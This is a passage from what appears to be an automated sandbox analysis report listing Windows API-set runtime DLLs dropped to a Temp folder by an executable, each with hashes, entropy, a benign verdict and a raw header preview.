MD5:	EFF11130BFE0D9C90C0026BF2FB219AE
SHA1:	CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
SHA-256:	03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
SHA-512:	8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-memory-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.101895292899441
Encrypted:	false
SSDEEP:	384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
MD5:	D500D9E24F33933956DF0E26F087FD91
SHA1:	6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
SHA-256:	BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
SHA-512:	C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...\|...................=...................................api-ms-win-core-memory-l1-1-0.dl

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-namedpipe-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.16337963516533
Encrypted:	false
SSDEEP:	192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
MD5:	6F6796D1278670CCE6E2D85199623E27
SHA1:	8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
SHA-256:	C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
SHA-512:	6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-processenvironment-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19248
Entropy (8bit):	7.073730829887072
Encrypted:	false
SSDEEP:	192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
MD5:	5F73A814936C8E7E4A2DFD68876143C8
SHA1:	D960016C4F553E461AFB5B06B039A15D2E76135E
SHA-256:	96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
SHA-512:	77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...\|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-processthreads-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19392
Entropy (8bit):	7.082421046253008
Encrypted:	false
SSDEEP:	384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
MD5:	A2D7D7711F9C0E3E065B2929FF342666
SHA1:	A17B1F36E73B82EF9BFB831058F187535A550EB8
SHA-256:	9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
SHA-512:	D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-processthreads-l1-1-1.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.1156948849491055
Encrypted:	false
SSDEEP:	384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
MD5:	D0289835D97D103BAD0DD7B9637538A1
SHA1:	8CEEBE1E9ABB0044808122557DE8AAB28AD14575
SHA-256:	91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
SHA-512:	97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-profile-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17712
Entropy (8bit):	7.187691342157284
Encrypted:	false
SSDEEP:	192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
MD5:	FEE0926AA1BF00F2BEC9DA5DB7B2DE56
SHA1:	F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
SHA-256:	8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
SHA-512:	0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-rtlsupport-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17720
Entropy (8bit):	7.19694878324007
Encrypted:	false
SSDEEP:	384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
MD5:	FDBA0DB0A1652D86CD471EAA509E56EA
SHA1:	3197CB45787D47BAC80223E3E98851E48A122EFA
SHA-256:	2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
SHA-512:	E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-string-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.137724132900032
Encrypted:	false
SSDEEP:	384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
MD5:	12CC7D8017023EF04EBDD28EF9558305
SHA1:	F859A66009D1CAAE88BF36B569B63E1FBDAE9493
SHA-256:	7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
SHA-512:	F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-synch-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20280
Entropy (8bit):	7.04640581473745
Encrypted:	false
SSDEEP:	384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
MD5:	71AF7ED2A72267AAAD8564524903CFF6
SHA1:	8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
SHA-256:	5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
SHA-512:	7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-synch-l1-2-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.138910839042951
Encrypted:	false
SSDEEP:	384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
MD5:	0D1AA99ED8069BA73CFD74B0FDDC7B3A
SHA1:	BA1F5384072DF8AF5743F81FD02C98773B5ED147
SHA-256:	30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
SHA-512:	6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...XuY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....XuY........9...T...T.......XuY........d...............XuY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...\|...............H...................A.....................................api-ms-win-core-synch-

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-sysinfo-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19248
Entropy (8bit):	7.072555805949365
Encrypted:	false
SSDEEP:	384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
MD5:	19A40AF040BD7ADD901AA967600259D9
SHA1:	05B6322979B0B67526AE5CD6E820596CBE7393E4
SHA-256:	4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
SHA-512:	5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#\|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-timezone-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18224
Entropy (8bit):	7.17450177544266
Encrypted:	false
SSDEEP:	384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
MD5:	BABF80608FD68A09656871EC8597296C
SHA1:	33952578924B0376CA4AE6A10B8D4ED749D10688
SHA-256:	24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
SHA-512:	3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-util-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.1007227686954275
Encrypted:	false
SSDEEP:	192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
MD5:	0F079489ABD2B16751CEB7447512A70D
SHA1:	679DD712ED1C46FBD9BC8615598DA585D94D5D87
SHA-256:	F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
SHA-512:	92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....f............!......................... ...............................0......`k....@.............................9............ ..................8=..............T............................................................................text...)........................... ..`.rsrc........ ......................@..@......f.........8...T...T.........f.........d.................f.....................RSDS*...$.L.Rm..l.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......9....edata... ..`....rsrc$01....` .......rsrc$02..........f.....J...................,...@...o...................j...}.........................api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.kernel32.DecodeSystemPointer.EncodePointer.kernel3

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-conio-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19256
Entropy (8bit):	7.088693688879585
Encrypted:	false
SSDEEP:	384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
MD5:	6EA692F862BDEB446E649E4B2893E36F
SHA1:	84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
SHA-256:	9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
SHA-512:	9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................8...d...d..................d......................................RSDS....<....2..u....api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...............T...............(.......................>...w.........../...W...p...........................,...L...l.......................,...L...m...............t...........'...^...............P...g...........................$...=...

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-convert-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22328
Entropy (8bit):	6.929204936143068
Encrypted:	false
SSDEEP:	384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
MD5:	72E28C902CD947F9A3425B19AC5A64BD
SHA1:	9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
SHA-256:	3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
SHA-512:	58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....NE............!.........................0...............................@............@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................NE.........:...d...d........NE.........d................NE.....................RSDS..e.7P.g^j..[....api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.....................NE.............z...z...8... .......(...C...^...y...........................1...N...k...............................*...E...`...y...............................5...R...o.......................,...M...n...........

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-environment-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18736
Entropy (8bit):	7.078409479204304
Encrypted:	false
SSDEEP:	192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
MD5:	AC290DAD7CB4CA2D93516580452EDA1C
SHA1:	FA949453557D0049D723F9615E4F390010520EDA
SHA-256:	C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
SHA-512:	B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....jU............!......................... ...............................0......G.....@............................."............ ..................0=..............T............................................................................text...2........................... ..`.rsrc........ ......................@..@v....................jU.........>...d...d........jU.........d................jU.....................RSDSu..1.N....R.s,"\....api-ms-win-crt-environment-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg......."....edata... ..`....rsrc$01....` .......rsrc$02.................jU.....................8...............C...d...........................3...O...l....................... .......5...Z...w.......................)...F...a...........................................................

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-filesystem-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20280
Entropy (8bit):	7.085387497246545
Encrypted:	false
SSDEEP:	384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
MD5:	AEC2268601470050E62CB8066DD41A59
SHA1:	363ED259905442C4E3B89901BFD8A43B96BF25E4
SHA-256:	7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
SHA-512:	0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......h...........!......................... ...............................0......I.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v......................h........=...d...d..........h........d..................h....................RSDS.....a.'..G...A.....api-ms-win-crt-filesystem-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................h............A...A...8...<...@...........$...=...V...q...................)...M...q......................./...O...o...........................7...X...v...........................6...U...r.......................

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-heap-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19256
Entropy (8bit):	7.060393359865728
Encrypted:	false
SSDEEP:	192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
MD5:	93D3DA06BF894F4FA21007BEE06B5E7D
SHA1:	1E47230A7EBCFAF643087A1929A385E0D554AD15
SHA-256:	F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
SHA-512:	72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...J.o ...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................J.o ........7...d...d.......J.o ........d...............J.o ....................RSDSq.........pkQX[....api-ms-win-crt-heap-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........J.o ....6...............(...........c...................S.......................1...V...y.......................<...c...........................U...z...............:...u...................&...E...p.......................,...U...

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-locale-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.13172731865352
Encrypted:	false
